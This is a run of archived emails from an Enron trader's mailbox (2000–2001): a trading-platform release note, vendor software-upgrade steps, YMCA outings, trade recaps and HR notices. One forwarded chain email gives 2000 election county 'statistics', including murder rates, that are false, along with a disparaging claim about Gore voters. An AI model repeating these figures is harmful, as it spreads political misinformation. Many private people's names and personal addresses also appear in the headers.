From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <24141051.1075857295189.JavaMail.evans@thyme>
Date: Mon, 14 May 2001 14:17:00 -0700 (PDT)
From: angusmcka@aol.com
To: bmckay@enron.com
Subject: Fwd: Ah hunting season
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Angusmcka@aol.com
X-To: bmckay@enron.com
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Return-Path: <dwylie@prodigy.net>
Received: from  rly-yg05.mx.aol.com (rly-yg05.mail.aol.com [172.18.147.5]) by 
air-yg03.mail.aol.com (v77_r1.36) with ESMTP; Mon, 14 May 2001 17:03:00 -0400
Received: from  pimout2-int.prodigy.net (pimout2-ext.prodigy.net 
[207.115.63.101]) by rly-yg05.mx.aol.com (v77_r1.36) with ESMTP; Mon, 14 May 
2001 17:02:16 -0400
Received: from prodigy.net (A010-0229.SANT.splitrock.net [209.254.203.229]) 
by pimout2-int.prodigy.net (8.11.0/8.11.0) with ESMTP id f4EL1Jw170452; Mon, 
14 May 2001 17:01:19 -0400
Message-ID: <3B0046DA.390F7A39@prodigy.net>
Date: Mon, 14 May 2001 15:58:02 -0500
From: "davis w. simpson" <dwylie@prodigy.net>
X-Mailer: Mozilla 4.5 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
Subject: Ah hunting season
Content-Type: multipart/mixed ; 
boundary="------------95CE71AE1C24DEF856204865"
To: undisclosed-recipients:;

With hunting season just around the corner I wanted to whip up a little
excitement so I am sending a picture of my Aggie buddy in his tree stand
last year.

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <17341653.1075857294915.JavaMail.evans@thyme>
Date: Fri, 27 Apr 2001 02:56:00 -0700 (PDT)
From: savita.puthigai@enron.com
Subject: VERY IMPORTANT ENRONONLINE  STACK MANAGER CHANGES
Cc: enron.group@enron.com, bob.shults@enron.com, daniel.diamond@enron.com,
	andy.zipper@enron.com
Mime-Version: 1.0
Content-Type: text/plain; charset=ANSI_X3.4-1968
Content-Transfer-Encoding: quoted-printable
Bcc: enron.group@enron.com, bob.shults@enron.com, daniel.diamond@enron.com,
	andy.zipper@enron.com
X-From: Savita Puthigai
X-To: EOL North America Traders@Enron
X-cc: Enron Sydney EOL Product Control Group, EOL Call Center@ECT, Bob Shults, Daniel Diamond, Andy Zipper
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

We will be releasing new version of the Stack Manager and the EnronOnline=
=20
website tonight . The following are the changes

1. Changes to Stack Manager:

1.1 Changes to toolbar icons:
To facilitate further development of the system, it has been found necessar=
y=20
to change the toolbar icons at the top of the Stack  Manager. The attached=
=20
file shows the old icon and its new replacement. Next to each image below i=
s=20
the description of the function that is executed as well as the short cut k=
ey=20
that is mapped to the same function:



1.2 New Functionality - Auto Suspend
The Auto Suspend function allows traders to set an absolute price change fr=
om=20
a price level at which you would like the system to automatically suspend a=
=20
specific product. This function is useful if your products use automatic=20
price resets.

To activate this feature:
1. Select a product and click on Product Properties
2. Check the Enable box
3. Enter the Price Check and Suspend at +/- values
4. Click Update
Example: a trader Enables Auto Suspend and selects a $35.00 Price Check and=
 a=20
suspension level of +/- $5.00: The system will suspend the product when the=
=20
mid price is above  $40.00 or below $30.00

You will need to enter a new Price Check or disable the Auto Suspend functi=
on=20
to reactivate this Product if the Auto Suspend is triggered. =20
Please note the system checks for any products that need to be suspended on=
ce=20
a minute.


2. Changes to EnronOnline Website
 (These changes will be rolled out in phases over the next week and will be=
=20
available to all customers only by Friday 5/4/01)

The following enhancements have been made to the EnronOnline Website:

2.1 Today=01,s Transactions

Float Window:  In order to float the window, right click on the Today=01,s=
=20
Transactions section, click on the Float Window option.

Sort Ordering: Click on the column heading to change the sort order.=20

Linked Transactions: You can display the linked Transactions in an expanded=
=20
or collapsed view. To do so, right click in the Transaction display area an=
d=20
select full Expand or Full Collapse.

2.2 Submission Box

The submission box has been modified in order to show a space between each=
=20
set of =01&zeros=018 for the volume the customer wants to sell/buy.


Savita

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <16163131.1075857292178.JavaMail.evans@thyme>
Date: Fri, 1 Dec 2000 05:33:00 -0800 (PST)
From: leroym@ymcahouston.org
To: lloveras@houston.rr.com, saproctors@yahoo.com, autumnld@yahoo.com,
	betsy_mill@yahoo.com, blakeburrintexas@aol.com,
	panowale-mooney@psinet.com, bmckay@enron.com, brian.becker@sfx.com,
	carolccourtney@aol.com, cabryan@pdq.net, dcshutts@netscape.net,
	debpruett@worldnet.att.net, liuect@hotmail.com, nikmat53@aol.com,
	gregory.spier@chase.com, hunterwhite@andrews-kurth.com,
	kwren_jwhit@prodigy.net, jeffreyf@bcm.tmc.edu, jeli32@aol.com,
	jim_e_hammelman@reliantenergy.com, jpollock@alumn.princeton.edu,
	jon@amerexenergy.com, kmguidry@earthlink.net,
	kim-kay-randt@usa.conoco.com, jleedeck@aol.com,
	lmoreland@cmdrealty.com, leli3322@aol.com, gspier2199@aol.com,
	lfc1012@swbell.net, mmorris@utilicorp.com, mjmorris_55@yahoo.com,
	mlanque@headworksusa.com, mike.b.davidson@ac.com, mhale@halexoil.com,
	panowak-mooney@psinet.com, rhdent@aol.com, rmatthews@dadassoc.com,
	rstevens@amelangpartners.com, houstonjscc@aol.com,
	scott.beasley@engageenergy.com, sjmille1@ix.netcom.com,
	proctors@phelps.com, stallen@flash.net, steve.pruett@enron.com,
	sjshapirol@aol.com, steven.cowan@db.com, looloofryz@aol.com,
	susan.fallon@enron.com, smccauley1@hotmail.com, todd327@aol.com,
	randt.tom.randt@sysco.com, jhpeacock@earthlink.net, shmoogs@aol.com,
	vickerdt@bp.com, vince.divita@jacobs.com, georgew@strasburger.com
Subject: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Leroy Mosley <leroym@ymcahouston.org>
X-To: Alan Lloveras <LLOVERAS@Houston.rr.com>, Amy Proctor <SAProctors@yahoo.com>, Autumn Davidson <autumnld@yahoo.com>, Betsy Miller <Betsy_mill@yahoo.com>, Blake Burr <blakeburrintexas@aol.com>, Boyd Mooney <panowale-mooney@psinet.com>, Brad McKay <BMcKay@enron.com>, Brian Becker <Brian.becker@SFX.com>, Carol Courtney <carolccourtney@aol.com>, Chris Bryan <cabryan@pdq.net>, David Shutts <DCShutts@netscape.net>, Debbie Pruett <debpruett@worldnet.att.net>, Eugene Liu <Liuect@hotmail.com>, "G.Joe Ellis" <Nikmat53@aol.com>, Greg Spier <gregory.spier@chase.com>, Hunter White <hunterwhite@andrews-kurth.com>, Jason Whittington <kwren_jwhit@prodigy.net>, Jeffrey Friedman <JeffreyF@bcm.tmc.edu>, Jeffrey Levine <Jeli32@aol.com>, Jim Hammelman <jim_e_hammelman@reliantenergy.com>, John Pollock <JPollock@alumn.Princeton.edu>, Jonathan Billings <Jon@amerexenergy.com>, Ken Guidry <KMGuidry@earthlink.net>, Kim-Kay Randt <Kim-Kay-Randt@usa.conoco.com>, Lee Decker <JLEEDECK@aol.com>, Lee Moreland <Lmoreland@cmdrealty.com>, Lesli Levine <Leli3322@aol.com>, Lisa Spier <GSpier2199@aol.com>, Lori Cohen <LFC1012@swbell.net>, Marijan Morris <mmorris@utilicorp.com>, "Mark J. Morris" <mjmorris_55@yahoo.com>, Michele Lanque <MLanque@headworksusa.com>, Mike Davidson <mike.b.davidson@ac.com>, Mike Hale <mhale@halexoil.com>, Patty Mooney <panowak-mooney@psinet.com>, Richard Dent <rhdent@aol.com>, Rick Matthews <rmatthews@dadassoc.com>, Rocky Stevens <rstevens@amelangpartners.com>, Sarah Billings <Houstonjscc@aol.com>, Scott Beasley <scott.beasley@engageenergy.com>, Scott Miller <SJMille1@ix.netcom.com>, Stan Proctor <Proctors@Phelps.com>, Steve Allen <Stallen@flash.net>, Steve Pruett <steve.pruett@enron.com>, Steve Shapiro <SJShapirol@aol.com>, Steven Cowan <steven.cowan@db.com>, Steven Loo <LooLoofryz@aol.com>, Susan Fallon <Susan.Fallon@enron.com>, Susan McCauley <smccauley1@hotmail.com>, Todd Crawford <todd327@aol.com>, Tom Randt <Randt.Tom.Randt@sysco.com>, Trey Peacock <jhpeacock@earthlink.net>, Trish Shapiro <Shmoogs@aol.com>, Troy Vickers <vickerdt@bp.com>, Vince Divita <vince.divita@jacobs.com>, Wiley George <GeorgeW@strasburger.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Greetings and Happy Holidays to all of my Big Braves and Little Guides and
Princesses,

This is just a reminder on the Children's Museum activity planned for
Saturday, 12/2/00.  This activity will be from Noon until 5:00pm.   The
admission is $10.00 for the Parent and the Child.  Please keep in mind that
the trip does not necessarily have to begin at Noon.  This is an activity
where you can set an arrival time that is convenient for yourself or your
tribe.   Just remember that the Museum closes at 5:00pm.  Unfortunately, I
have an emergency that can not be avoided so I will be arriving probably
later in the day if at all.  Please contact anyone who you feel may benefit
from this outing whether it be tribal members or family and friends.   I
will be in touch again soon to give details on the Holiday Skating Party at
the Sharpstown skating center.  I hear that Santa is going to be there so
I'm sure that it's going to be a blast.

Howling Wolf

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <30617904.1075857292204.JavaMail.evans@thyme>
Date: Sun, 3 Dec 2000 04:42:00 -0800 (PST)
From: mnl@ranches.org
To: molag@arn.net, tom@ranches.org, tina_aikman@hotmail.com, teel@ranches.org,
	soak55@yahoo.com, susie@ranches.org, spmarrs@wpe.com,
	sandrag@arn.net, ssticksel@aol.com, psticksel@aol.com,
	nancycw99@yahoo.com, nde3045@aol.com, johndutch@aol.com,
	murwife@amaonline.com, stix@arn.net, mgpate@arn.net,
	margaretjherring@worldnet.att.net, lizseliger@hotmail.com,
	txkarebear@aol.com, jamitchell52@hotmail.com, jsticksel@cs.com,
	jothatch@arn.net, jay@ranches.org, chompers@flash.net,
	janie@centramedia.net, rcavinessc@netscape.net, rex@arn.net,
	hjohnston@bigplanet.com, esb@tcac.net, elasmith@aol.com,
	dmoreland@austin.rr.com, crimblue@aol.com, cissybankhead@hotmail.com,
	cjboyd@aol.com, cgarner@tcac.net, tritail@cox-internet.com,
	brad.mckay@enron.com, otlr@aol.com, dbarry02@sprynet.com
Subject: FW: The last statistic is the good one
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: "Mary Nell Lemert" <MNL@ranches.org>
X-To: "Vicki LaGrone" <molag@arn.net>, "Tom Bivins" <Tom@ranches.org>, "Tina Aikman" <tina_aikman@hotmail.com>, "Teel Bivins" <Teel@ranches.org>, "Sylvia Frazer" <soak55@yahoo.com>, "Susie O'Brien" <Susie@ranches.org>, "Sharon Price Marrs" <spmarrs@wpe.com>, "Sandra Gilliland" <sandrag@arn.net>, "Scott Sticksel" <SSTICKSEL@aol.com>, "Pan Sticksel" <PSTICKSEL@aol.com>, "Nancy Williams" <nancycw99@yahoo.com>, "Nancy Ethridge" <nde3045@aol.com>, "Nancy Baay" <johndutch@aol.com>, "Murray/Jeri Gossett" <murwife@amaonline.com>, "Michaele Sticksel" <stix@arn.net>, "Mary Pate" <mgpate@arn.net>, "Margaret Herring" <margaretjherring@worldnet.att.net>, "Liz Seliger" <lizseliger@hotmail.com>, "Karen Stephenson" <TXKarebear@aol.com>, "Julie Mitchell" <jamitchell52@hotmail.com>, "JSticksel" <JSticksel@cs.com>, "Joann Thatcher" <jothatch@arn.net>, "Jay O'Brien" <Jay@ranches.org>, "Jas Lemert" <chompers@flash.net>, "Janie Hathoot" <janie@centramedia.net>, "Janette Caviness" <rcavinessc@netscape.net>, "J. Rex Lemert P.C." <rex@arn.net>, "Hjohnston" <hjohnston@bigplanet.com>, "Ellen Bivins" <esb@tcac.net>, "Elaine Smith" <elasmith@aol.com>, "Dan Moreland" <dmoreland@austin.rr.com>, "Claudette Landess" <crimblue@aol.com>, "Cissy Bankhead" <cissybankhead@hotmail.com>, "Cheri Boyd" <cjboyd@aol.com>, "Carolyn Garner" <cgarner@tcac.net>, "Carol Harrell" <tritail@cox-internet.com>, "Brad McKay" <Brad.Mckay@enron.com>, "Annette Lemert" <OTLR@aol.com>, "Barry Jones" <dbarry02@sprynet.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

-----Original Message-----
From: leslie@gripfast.com [mailto:leslie@gripfast.com]
Sent: Friday, December 01, 2000 1:47 PM
To: lindab@arn.net; margo@coredata.net; moe@amaonline.com;
leslied@completedata.com; john@amaonline.com; lisa.eason@med.va.gov;
BeckyMcKi@aol.com
Subject: The last statistic is the good one


Subject:  The last statistic is the good one



Important statistics:

Counties won by Gore: 677
Counties won by Bush: 2,434

Population of counties won by Gore: 127 million
Population of counties won by Bush: 143 million

Square miles of country won by Gore: 580,000
Square miles of country won by Bush: 2,427,000

States won by Gore: 19
States won by Bush: 29

Average Murder per 100,000 residents in counties won by Gore: 13.2
Average Murder per 100,000 residents in counties won by Bush: 2.1

Ah ? those Gore voters.

And may I add that the map of the territory Bush won was the land owned
by the people of this great Country. Not the citizens living in cities
in housing owned by the government.and living off the government.

(Source: Professor Joseph Olson of the Hamline University School of Law
in St. Paul Minnesota)





From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <32018063.1075857295211.JavaMail.evans@thyme>
Date: Wed, 16 May 2001 12:12:00 -0700 (PDT)
From: perfmgmt@enron.com
To: brad.mckay@enron.com
Subject: Mid-Year 2001 Performance Feedback
Mime-Version: 1.0
Content-Type: text/plain; charset=ANSI_X3.4-1968
Content-Transfer-Encoding: 7bit
X-From: "Performance Evaluation Process (PEP)" <perfmgmt@enron.com>
X-To: "MCKAY, BRADLEY T" <brad.mckay@enron.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

MCKAY, BRADLEY T,
?
You have been selected to participate in the Mid Year 2001 Performance 
Management process.  Your feedback plays an important role in the process, 
and your participation is critical to the success of Enron's Performance 
Management goals.
?
To complete a request for feedback, access PEP at http://pep.enron.com and 
select Complete Feedback from the Main Menu.  You may begin providing 
feedback immediately and are requested to have all feedback forms completed 
by Friday, May 25, 2001. 
?
If you have any questions regarding PEP or your responsibility in the 
process, please contact the PEP Help Desk at:
Houston:  1.713.853.4777, Option 4 or email: perfmgmt@enron.com
London:  44.207.783.4040, Option 4 or email: pep.enquiries@enron.com 
?
Thank you for your participation in this important process. 
?
The following is a CUMULATIVE list of employee feedback requests with a 
status of "OPEN."  Once you have submitted or declined an employee's request 
for feedback, their name will no longer appear on this list.  NOTE: YOU WILL 
RECEIVE THIS MESSAGE EACH TIME YOU ARE SELECTED AS A REVIEWER. 
?
Employee Name:
LILLY, KYLE
RANK, SABINA
THIBAUT, DANIEL

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <27879818.1075857295121.JavaMail.evans@thyme>
Date: Fri, 11 May 2001 05:55:00 -0700 (PDT)
From: brad.mckay@enron.com
To: laura.osman@travelpark.com
Subject: Re: Review and approve for accuracy.
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: Laura Osman <laura.osman@travelpark.com> @ ENRON
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Can you tell me if i can fly southwest to and from dallas? If I can what 
would this cost me? Brad

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <22748960.1075857291944.JavaMail.evans@thyme>
Date: Wed, 27 Sep 2000 04:51:00 -0700 (PDT)
From: brad.mckay@enron.com
To: chip.gist@ourclub.com
Subject: BDay
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: Chip.gist@ourclub.com
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Chip: Thanks for the call yesterday. You are now as old as I am, but I am not 
sure if you are as mature as I am. Happy Birthday, have a great day. Brad

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <8406515.1075857295167.JavaMail.evans@thyme>
Date: Mon, 14 May 2001 05:15:00 -0700 (PDT)
From: sean.boyle@enron.com
To: scott.neal@enron.com, brad.mckay@enron.com, john.lavorato@enron.com
Subject: NY City Information
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Sean Boyle
X-To: Scott Neal, Brad McKay, John J Lavorato
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Scott,
I overheard you talking about NY City studies earlier.  The two files 
attached were work in progress that I although not completed and a little 
rough I thought may be useful in their current form.  I am working with 
Sabina Rank to take over and complete all of my projects and daily 
fundamentals duties.
Please let me know if you have any questions.
Thanks,
Sean


If you have problems with the links when opening this file, I also put a copy 
in O//_Dropbox

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <11335230.1075857292396.JavaMail.evans@thyme>
Date: Wed, 13 Dec 2000 06:32:00 -0800 (PST)
From: matthew.fleming@enron.com
To: brad.mckay@enron.com
Subject: Financial deals for 12/13
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Matthew B Fleming
X-To: Brad McKay
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Here is a recap:

all nx1 and all paper buys


Tetco M3:

4/01  180,000  0.47
5/01  100,000  0.465
11/01  20,000  0.85
12/01  20,000  1.15
4/02-10/02 40,000/mth 0.44



Transco Z6


4/01  110,000  0.70
11/01  40,000  1.60
12/01  40,000  2.00



Henry Hub


4/01-10/01 70,000  .0075



Matt

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <23109490.1075857292250.JavaMail.evans@thyme>
Date: Tue, 5 Dec 2000 02:45:00 -0800 (PST)
From: colleen.sullivan@enron.com
To: phillip.allen@enron.com, sandra.brawner@enron.com, chris.germany@enron.com,
	dick.jenkins@enron.com, dan.junek@enron.com, thomas.martin@enron.com,
	greg.mcclendon@enron.com, scott.neal@enron.com,
	kimberly.olinger@enron.com, hunter.shively@enron.com,
	judy.townsend@enron.com, elsa.villarreal@enron.com,
	scott.goodell@enron.com, keith.holst@enron.com,
	kate.fraser@enron.com, andrew.lewis@enron.com,
	john.lavorato@enron.com, brad.mckay@enron.com,
	mike.grigsby@enron.com, martin.cuilla@enron.com,
	peter.keavey@enron.com, deirdre.mccaffrey@enron.com,
	sylvia.pollan@enron.com, geoff.storey@enron.com
Subject: Regulatory Filing Summary
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Colleen Sullivan
X-To: Phillip K Allen, Sandra F Brawner, Chris Germany, Dick Jenkins, Dan Junek, Thomas A Martin, Greg McClendon, Scott Neal, Kimberly S Olinger, Hunter S Shively, Judy Townsend, Elsa Villarreal, Scott Goodell, Keith Holst, Kate Fraser, Andrew H Lewis, John J Lavorato, Brad McKay, Mike Grigsby, Martin Cuilla, Peter F Keavey, Deirdre McCaffrey, Sylvia S Pollan, Geoff Storey
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Attached is the latest summary of regulatory filings.  Please let me know if 
you no longer want this report or if you want to add someone to the 
distribution.  For those of you who are receiving this for the first time, it 
is a summary of all pipeline related filings with FERC that may have an 
effect on your business.

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <30648664.1075857292310.JavaMail.evans@thyme>
Date: Mon, 11 Dec 2000 08:41:00 -0800 (PST)
From: brad.mckay@enron.com
To: kelly@truequote.com
Subject: Re: New TrueQuote!
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: "Kelly Stroud" <kelly@truequote.com> @ ENRON
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Thanks for your help. I hope that you were not offended by my comments the 
other day, they were not directed at you. Brad

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <9737934.1075857292033.JavaMail.evans@thyme>
Date: Tue, 28 Nov 2000 14:07:00 -0800 (PST)
From: panowak-mooney@psinet.com
To: nikmat53@aol.com, proctors@phelps.com, saproctors@yahoo.com,
	rmatthews@dadassoc.com, dcshutts@netscape.net,
	kim-kay.randt@usa.conoco.com, mike.b.davidson@ac.com,
	autumnld@yahoo.com, mhale@halexoil.com, bcmooney@airmail.net,
	mcclear2@ix.netcom.com, gateway1@pdq.net, mmorris@globalport.com,
	bmckay@enron.com
Subject: Indian Guides Campout and skating party
Mime-Version: 1.0
Content-Type: text/plain; charset=ANSI_X3.4-1968
Content-Transfer-Encoding: 7bit
X-From: "Patti Mooney" <panowak-mooney@psinet.com>
X-To: <Nikmat53@aol.com>, <Proctors@Phelps.com>, <saproctors@yahoo.com>, <rmatthews@dadassoc.com>, <dcshutts@netscape.net>, <kim-kay.randt@usa.conoco.com>, <mike.b.davidson@ac.com>, <autumnld@yahoo.com>, <mhale@halexoil.com>, <bcmooney@airmail.net>, <mcclear2@ix.netcom.com>, <gateway1@pdq.net>, <mmorris@globalport.com>, <bmckay@enron.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Hi Guys,
?
Good news, the campout for this weekend will take place at  Camp Pine Tree 
rather than Camp Cullen.? Camp Pine Tree is just north of  Houston off I-45 
near Old Town Spring.? The Dads and boys are planning to  meet for dinner 
Friday at 6 pm at Fuddruckers on I-10 (behind Pappasitos) and  then drive up 
to the camp and check in.? Rick is working with LeRoy at the  YMCA to have 
everyone in the cabin.? For more information about the Camp  you can log onto 
www.campymca.org
?
?
?On December 9th the Indian Guides will meet with the  YMCA KODA nation at 
Sharpstown Ice Center , 7300 Bellerive, at Noon and will  skate until 1:30.? 
Admission is $5.64 per person which includes skate  rental.? ( Santa is going 
to stop by too!!!)? Please let Rick Matthews  or myself know if you plan to 
attend so we can pass the information along to the  YMCA for planning 
purposes.
?
Call if you have any questions and I will try to answer them  or get answers 
for you.
?
Patti Mooney
713/365-0174

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <23202405.1075857295011.JavaMail.evans@thyme>
Date: Thu, 3 May 2001 05:02:00 -0700 (PDT)
From: panderson@intcx.com
To: brad.mckay@enron.com
Subject: FW: SP3 for e-mail-Enron-Brad Mckay
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Pam Anderson <PAnderson@intcx.com>
X-To: "'brad.mckay@enron.com'" <brad.mckay@enron.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

> Dear  Brad ,
>
> t was great to speak to you today.  I have provide the instrucitons to
> upgrade ICE to version 7.37.   Please forward these instructions to your
> IT Department.  We are strongly recomending that you upgrade.  It involves
> some major changes.
>
> Please call me if you have any further questions.
>
> Thanks for your assistance.
>
>
> Pamela Anderson
> IntercontinentalExchange
> Phone 713-840-6494
> cell 713-898-8102
> panderson@intcx.com
>
>
> Installation of SP 3 is strongly recommended.
>
> SP 3 remedies existing issues in production and includes new functionality
> requests from the market.
> Functional enhancements to the platform include the introduction of a user
> preference to "Show best
> derived order" for all ICE spread markets, portfolio sort capabilities (by
> strip, by hub, alphabetical, etc.),
> and the ability to send messages to red orders.
>
> A full-scale enhanced client, version 7.37, will be listed along with SP 3
> and will be published to www.intcx.com
> under the "Downloads" link.  In addition, an API client (version 7.37)
> will be published to the same website
> location.  Release notes for SP 3 will be available from that site.
>
> To download The ICE client, follow the steps below:
>
> 1.) Go to the following site: www.intcx.com/index1.html and click on the
> link "Downloads"
> 2.) Enter your ID and Password in the fields provided.
> 3.) Under the heading: Production Environment...ICE Client...  click
> Install ICE p_7.37_s.exe.
>
> Note: Create an appropriate folder in your directory structure to prevent
> over-writing your current production
>  version, if applicable.  Follow the default settings.
>
> To apply The ICE patch, follow the steps below:
>
> 1.) Go to the following site: www.intcx.com/index1.html and click on the
> link "Downloads"
> 2.) Enter your ID and Password in the fields provided.
> 3.) Under the heading: Production Environment...ICE Client Patches...
> click Install
> 5.)  When the File Download window comes up please put the radio button in
> Save this file to disk and save it
> to your local hard drive or LAN.
> 6.)  Once saved, go to SP 3 (on your local drive or your LAN) and double
> click on the SP3.zip file (you will need
> to have WinZip on the local machine).
> 7.)  Extract these files to your C:\Program Files\INTCX\The ICE folder and
> overwrite the current files (you
> must overwrite the current files).
>
> Note:If your ICE folder is named differently than number 7 above,
> overwrite to the appropriate folder.
>
> For Installation Questions -- call The ICE Help Desk -- 770.738.2101.
>
> Pete Van Winkle
> Intercontinental Exchange, LLC
> 2100 Riveredge Pkwy, Suite 400
> Atlanta, GA 30328
>
> +1 770-738-2101
> +1 770-951-5481 (fax)
>
> <http://www.intcx.com/>
> ICE HelpDesk: +1 770-738-2101
>
>
>
>  <<SP3.zip>>

 - SP3.zip

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <26772259.1075857295033.JavaMail.evans@thyme>
Date: Mon, 7 May 2001 15:20:00 -0700 (PDT)
From: enron.announcements@enron.com
To: all.states@enron.com
Subject: ClickAtHome Portal is HERE!
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Enron Announcements
X-To: All Enron Employees United States
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Version 2.0 of the ClickAtHome Portal is now available!  
 Log into www.clickathome.net now, from work or home!

Access the PEP System through the portal!  
 Choose your reviewers and fill out your evaluations in the comfort and 
privacy of your home!

Outlook Web Access and eHRonline will be available SOON!  

The ClickAtHome portal is fully customizable for you!  
 YOU choose the content on each page, as well as the look and feel! 

Note: the ClickAtHome portal must be launched through an Internet Explorer 
browser, 5.0 or higher.

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <30255322.1075857294891.JavaMail.evans@thyme>
Date: Wed, 25 Apr 2001 15:55:00 -0700 (PDT)
From: enron.announcements@enron.com
To: all.houston@enron.com
Subject: Enron Astroworld Tickets
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Enron Announcements
X-To: All Enron Houston
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Jun2001\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Enron announces UNLIMITED discounted AstroWorld tickets for employees.

Due to overwhelming employee feedback, we have negotiated unlimited 
discounted AstroWorld tickets for you and your family in place of the 
traditional "Enron Day At AstroWorld."  We hope this will allow Enron 
families to plan their fun-filled summer trips to AstroWorld at their own 
convenience.  Enron AstroWorld tickets are $20.56 (Retail $50), which 
includes admission for one, plus a $7 meal ticket to one of five restaurants 
at AstroWorld.

Six Flags AstroWorld is a world-class family entertainment complex filled 
with exciting rides and attractions, including 10 heart-pounding coasters, 
over  40 blockbuster shows, interactive street entertainers and star-studded 
concerts.  Enron families will be able to purchase unlimited tickets for use 
anytime during the 2001 season.

Tickets will be on sale at Enron's Federal Credit Union, EB0399.  Visit the 
credit union in person to make your purchases.  AstroWorld tickets will not 
be mailed.  Enron employees who are not already Enron FCU members may pay by 
cash or money order only.  All Enron Employees are encouraged to take 
advantage of this great summer fun deal and may purchase tickets through 
August 30th.

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <27925101.1075857292375.JavaMail.evans@thyme>
Date: Wed, 13 Dec 2000 05:35:00 -0800 (PST)
From: ckooken@xonex.com
To: waltercameron@hotmail.com, lara_karpf@aimfunds.com, worsham@pdq.net,
	lesworsham@prodigy.net, jwrich@pdq.net, jmtodd@gateway.net,
	lonestarbb@aol.com, jaybecca@email.com, kooken@pdq.net,
	bryce.mccarra@rjrt.com, bmckay@enron.com
Subject: Updates for Week 15 Results plus current composite.
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: "Craig Kooken" <ckooken@xonex.com>
X-To: "Walter Cameron" <waltercameron@hotmail.com>, "Tom Greer" <lara_karpf@aimfunds.com>, "Mills Worsham" <worsham@pdq.net>, "Les Worsham" <lesworsham@prodigy.net>, "John W. Rich" <jwrich@pdq.net>, "John Todd" <jmtodd@gateway.net>, "Jim Moose Malone" <LONESTARBB@aol.com>, "Jason Swanson" <JayBecca@email.com>, "Craig Kooken" <kooken@pdq.net>, "Byrce McCarra" <Bryce.McCarra@RJRT.com>, "Brad McKay" <BMcKay@enron.com>
X-cc: 
X-bcc: 
